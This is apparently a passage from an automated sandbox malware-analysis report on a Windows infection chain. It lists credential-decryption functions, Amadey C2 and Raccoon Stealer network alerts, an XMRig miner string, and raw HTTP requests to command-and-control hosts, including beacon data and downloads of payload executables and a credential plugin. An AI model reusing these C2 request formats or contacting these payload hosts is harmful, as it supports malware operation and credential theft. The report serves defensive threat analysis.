Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	20_2_00407470
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,	20_2_00404830
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,	20_2_00407510
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_00407190 CryptUnprotectData,	20_2_00407190
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	20_2_004077A0

Bitcoin Miner:

Found strings related to Crypto-Mining

Show sources

Source: 7801.exe, 0000002B.00000002.1009587060.0000000003790000.00000002.00020000.sdmp

String found in binary or memory: XMRig 6.2.2es\AppData\Roaming\Sysfiles\Driver.exed-F

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Unpacked PE file: 20.2.7CA1.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Unpacked PE file: 21.2.86C4.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Unpacked PE file: 36.2.lagavljy.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Unpacked PE file: 43.2.7801.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Unpacked PE file: 43.2.7801.exe.400000.0.unpack

Source: U3E7zMaux2.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\AppData\Local\Temp\D984.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.4:49876 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49878 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49896 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49947 version: TLS 1.2

Source:	Binary string: C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdb source: 7801.exe, 7801.exe, 0000002B.00000003.845288263.0000000003030000.00000004.00000001.sdmp, 7801.exe, 0000002B.00000002.955535895.0000000002F70000.00000040.00000001.sdmp
Source:	Binary string: msvcrt.pdbk source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.769293976.0000000001136000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: )C:\daz\yataduweperema14_kehudazoha60\rilowi.pdb source: 86C4.exe, 00000015.00000000.775793365.0000000000413000.00000002.00020000.sdmp, 86C4.exe, 00000015.00000002.797218402.0000000000415000.00000002.00020000.sdmp, 86C4.exe, 00000015.00000002.803177540.000000000080E000.00000004.00000020.sdmp, lagavljy.exe, 00000024.00000002.806723360.0000000000415000.00000002.00020000.sdmp, lagavljy.exe, 00000024.00000000.796164744.0000000000413000.00000002.00020000.sdmp
Source:	Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb86 source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source:	Binary string: -C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdbh source: 7801.exe, 0000002B.00000003.845288263.0000000003030000.00000004.00000001.sdmp, 7801.exe, 0000002B.00000002.955535895.0000000002F70000.00000040.00000001.sdmp
Source:	Binary string: profapi.pdb*6 source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: D984.exe, 0000000E.00000000.760514198.0000000000413000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.752502381.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000012.00000002.795990218.00000000007B0000.00000002.00020000.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source:	Binary string: el.pdb source: 7801.exe
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbz6 source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdbk source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: C:\zoro\veme_81\vujiwoli76 gag\sipowatelunem36\locufiyazed.pdb source: 7CA1.exe, 00000014.00000000.769330269.0000000000413000.00000002.00020000.sdmp
Source:	Binary string: /;C:\topidusas82\zesobuc.pdb source: U3E7zMaux2.exe, 00000000.00000000.652670443.0000000000413000.00000002.00020000.sdmp, U3E7zMaux2.exe, 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp, uufaeea, 0000000B.00000000.744804778.0000000000413000.00000002.00020000.sdmp, uufaeea, 0000000B.00000002.754010402.0000000000413000.00000002.00020000.sdmp, E666.exe, 00000011.00000000.759211933.0000000000413000.00000002.00020000.sdmp, E666.exe, 00000011.00000002.772149051.0000000000413000.00000002.00020000.sdmp
Source:	Binary string: :]WC:\yakon-nabavazolof\masa.pdb source: 7801.exe, 0000002B.00000003.848141187.0000000003200000.00000004.00000001.sdmp, 7801.exe, 0000002B.00000002.982597613.0000000003150000.00000040.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: C:\yakon-nabavazolof\masa.pdb source: 7801.exe, 0000002B.00000003.848141187.0000000003200000.00000004.00000001.sdmp, 7801.exe, 0000002B.00000002.982597613.0000000003150000.00000040.00000001.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: C:\daz\yataduweperema14_kehudazoha60\rilowi.pdb source: 86C4.exe, 00000015.00000000.775793365.0000000000413000.00000002.00020000.sdmp, 86C4.exe, 00000015.00000002.797218402.0000000000415000.00000002.00020000.sdmp, 86C4.exe, 00000015.00000002.803177540.000000000080E000.00000004.00000020.sdmp, lagavljy.exe, 00000024.00000002.806723360.0000000000415000.00000002.00020000.sdmp, lagavljy.exe, 00000024.00000000.796164744.0000000000413000.00000002.00020000.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb&6 source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source:	Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: D984.exe, 0000000E.00000000.760514198.0000000000413000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.752502381.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000012.00000002.795990218.00000000007B0000.00000002.00020000.sdmp
Source:	Binary string: C:\topidusas82\zesobuc.pdb source: U3E7zMaux2.exe, 00000000.00000000.652670443.0000000000413000.00000002.00020000.sdmp, U3E7zMaux2.exe, 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp, uufaeea, 0000000B.00000000.744804778.0000000000413000.00000002.00020000.sdmp, uufaeea, 0000000B.00000002.754010402.0000000000413000.00000002.00020000.sdmp, E666.exe, 00000011.00000000.759211933.0000000000413000.00000002.00020000.sdmp, E666.exe, 00000011.00000002.772149051.0000000000413000.00000002.00020000.sdmp

Source: C:\Users\user\AppData\Local\Temp\7801.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\

Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	20_2_00405E40
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	20_2_004096E0
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	20_2_00401280
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	20_2_00401090
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,	20_2_00409B40
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	20_2_00409970
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	20_2_004087E0

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.4:49887 -> 141.8.194.74:80
Source: Traffic	Snort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.4:49902 -> 185.215.113.35:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49901 -> 185.215.113.35:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49904 -> 185.215.113.35:80
Source: Traffic	Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.4:49905 -> 141.8.194.74:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49910 -> 185.215.113.35:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49912 -> 185.215.113.35:80
Source: Traffic	Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.4:49916 -> 185.163.204.24:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49919 -> 185.215.113.35:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49923 -> 185.215.113.35:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49924 -> 185.215.113.35:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49925 -> 185.215.113.35:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49926 -> 185.215.113.35:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49932 -> 185.215.113.35:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49934 -> 185.215.113.35:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49936 -> 185.215.113.35:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49938 -> 185.215.113.35:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49942 -> 185.215.113.35:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49943 -> 185.215.113.35:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49948 -> 185.215.113.35:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49949 -> 185.215.113.35:80
Source: Traffic	Snort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.4:49950 -> 185.215.113.35:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: pool.supportxmr.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: patmushta.info
Source: C:\Windows\explorer.exe	Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe	Network Connect: 188.166.28.199 80	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 40.93.212.0 25
Source: C:\Windows\explorer.exe	Domain query: unicupload.top
Source: C:\Windows\explorer.exe	Network Connect: 185.233.81.115 187	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 8.209.67.104 443
Source: C:\Windows\explorer.exe	Network Connect: 185.7.214.171 144	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: host-data-coin-11.com
Source: C:\Windows\explorer.exe	Domain query: privacy-tools-for-you-780.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: microsoft-com.mail.protection.outlook.com
Source: C:\Windows\explorer.exe	Domain query: goo.su
Source: C:\Windows\explorer.exe	Domain query: transfer.sh
Source: C:\Windows\explorer.exe	Domain query: a0621298.xsph.ru
Source: C:\Windows\explorer.exe	Network Connect: 185.186.142.166 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: data-host-coin-8.com

Source: global traffic	HTTP traffic detected: POST /d2VxjasuwS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----aea6c0e437f81733b7ee77dd06981aeaHost: 185.215.113.35Content-Length: 83351Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d2VxjasuwS/plugins/cred.dll HTTP/1.1Host: 185.215.113.35
Source: global traffic	HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: GET /3.exe HTTP/1.1Host: a0621298.xsph.ruAccept: /
Source: global traffic	HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: GET /capibar HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.204.22
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.163.204.24
Source: global traffic	HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/870316542b6e8d6795384509412b3780ad4b1d32 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
Source: global traffic	HTTP traffic detected: GET /advert.msi HTTP/1.1Host: a0621298.xsph.ruAccept: /
Source: global traffic	HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: GET /File.exe HTTP/1.1Host: a0621298.xsph.ruAccept: /
Source: global traffic	HTTP traffic detected: GET /123.exe HTTP/1.1Host: a0621298.xsph.ruAccept: /
Source: global traffic	HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: GET /442.exe HTTP/1.1Host: a0621298.xsph.ruAccept: /
Source: global traffic	HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: GET /512412.exe HTTP/1.1Host: a0621298.xsph.ruAccept: /
